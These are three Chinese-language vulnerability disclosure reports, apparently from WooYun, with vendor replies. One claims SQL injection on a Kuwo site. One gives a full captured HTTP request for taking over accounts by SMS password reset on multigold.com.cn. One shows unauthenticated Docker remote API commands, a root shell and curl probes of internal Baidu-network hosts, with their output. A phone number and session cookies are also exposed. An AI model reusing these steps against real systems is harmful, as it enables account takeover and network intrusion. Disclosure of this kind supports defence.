漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-05-02： 厂商已经确认，细节仅向厂商公开2016-05-12： 细节向核心白帽子及相关领域专家公开2016-05-22： 细节向普通白帽子公开2016-06-01： 细节向实习白帽子公开2016-06-16： 细节向公众公开简要描述：你们都去挖st2-032吧，注入都留给我~~~详细说明： mask 区域*****ew?id=8&device=&u***** 注入点：id手动报错猜解user()，ROOT权限脚本就不放了，代码写的。。。漏洞证明： 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：7确认时间：2016-05-02 19:30厂商回复：感谢对酷我的支持，我们将尽快进行修复！最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：RTRT详细说明：打开http://www.multigold.com.cn/forgetPassword.html抓取数据包POST /myec/member_sendMobileCode.html HTTP/1.1Host: www.multigold.com.cnContent-Length: 34Accept: */*Origin: http://www.multigold.com.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.multigold.com.cn/forgetPassword.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: isM=y; JSESSIONID=2C26CBCF9A46278CAA538326D8C487A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www.multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26|pv:2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309Connection: closememberId=118953&mobile=13730766696把手机号改为自己的短信接收到OK密码为123456 漏洞证明：打开http://www.multigold.com.cn/forgetPassword.html抓取数据包POST /myec/member_sendMobileCode.html HTTP/1.1Host: www.multigold.com.cnContent-Length: 34Accept: */*Origin: http://www.multigold.com.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.multigold.com.cn/forgetPassword.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: isM=y; JSESSIONID=2C26CBCF9A46278CAA538326D8C487A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www.multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26|pv:2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309Connection: closememberId=118953&mobile=13730766696把手机号改为自己的短信接收到OK密码为123456 修复方案：暂无版权声明：转载请注明来源 奶嘴@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：16确认时间：2016-05-06 09:45厂商回复：感谢您提供的信息最新状态：暂无

漏洞详情披露状态： 2016-05-17： 细节已通知厂商并且等待厂商处理中2016-05-17： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-17： 厂商已经主动忽略漏洞，细节向公众公开简要描述：请允许我再刷一个～什么时候有first blood效果预告！drops分析文章即将发布详细说明：docker remote api未授权访问code 区域http://180.76.161.55:2375查看运行的容器code 区域docker -H tcp://180.76.161.55:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES d294b4eed64f registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91 "/usr/bin/tini -- /us" 7 weeks ago Up 7 weeks 0.0.0.0:8888->8080/tcp grave_williams e6ba8c1ca7e8 swarm "/swarm join --advert" 7 weeks ago Up 7 weeks 2375/tcp sick_lichterman域名证明为百度code 区域registry.bae.bj.baidubce.com拿root权限，过程请参考之后发布的drops文章ifconfigcode 区域[email protected]/* */:~# ifconfigdocker0 Link encap:Ethernet HWaddr 02:42:df:68:95:78inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:933462 errors:0 dropped:0 overruns:0 frame:0TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:77456385 (77.4 MB) TX bytes:119620987 (119.6 MB)eth0 Link encap:Ethernet HWaddr fa:16:3e:75:d9:b9inet addr:192.168.2.189 Bcast:192.168.255.255 Mask:255.255.0.0inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1400 Metric:1RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:2681279156 (2.6 GB) TX bytes:2649540661 (2.6 GB)registry.bae.bj.baidubce.com内网ip 10.16.83.153code 区域[email protected]/* */:~# ping registry.bae.bj.baidubce.comPING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms经过测试发现与WooYun: 一不小心走进了百度内网 漏洞在同一网段code 区域[email protected]/* */:~# curl 10.16.83.164:8080__ _ __/ /_ ____ _(_)___/ /_ __ _________ _____/ __ \/ __ `/ / __ / / / /_____/ ___/ __ \/ ___// /_/ / /_/ / / /_/ / /_/ /_____/ / / /_/ / /__/_.___/\__,_/_/\__,_/\__,_/ /_/ / .___/\___//_/User Manual : http://wiki.baidu.com/display/RPC/status : Status of services/connections : List all connections/flags : List all gflags/flags/port : List the gflag/flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)/flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues./vars : List all exposed bvars/vars/rpc_num_sockets : List the bvar/vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)/rpcz : Recent RPC calls(disabled)/rpcz/stats : Statistics of rpcz/rpcz?time=2016/05/17-00:05:28 : RPC calls before the time/rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the timeOther filters: min_latency, min_request_size, min_response_size, log_id, error_code/rpcz?trace=N : Recent RPC calls whose trace_id is N/rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M/hotspots/cpu : Profiling CPU (disabled)/hotspots/heap : Profiling heap (disabled)/hotspots/growth : Profiling growth of heap (disabled)curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json/version : Version of this server, set by Server::set_version()/health : Test healthy/vlog : List all VLOG callsites/sockets : Check status of a Socket/bthreads : Check status of a bthread/ids : Check status of a bthread_id/protobufs : List all protobuf services and messages/list : json signature of methods/threads : Check pstack (disabled)/dir : Browse directories and files (disabled)code 区域[email protected]/* */:~# curl 10.16.83.151[cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network已证明，不再深入漏洞证明： 修复方案： 版权声明：转载请注明来源 黑客,绝对是黑客@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-17 11:41厂商回复：赞这个提交！很cool，但是，但是，经过我们排查，这个漏洞非百度及开放云漏洞。我们开放云的客户在虚机上使用了BAE公共docker镜像搭建了docker服务来测试，并且开启了remote api，却没有认证！客户说，这个只是他的测试帐号，明天将会重装，允许我们提前忽略来配合drops文章的发布，非常期待！最新状态：2016-05-17：至于10.16.83.X，该段设计之初就是暴露给北京region的云上租户虚机，提供的都是公共服务。如果发现公共服务存在漏洞，欢迎通过BSRC或者WooYun报告给我们。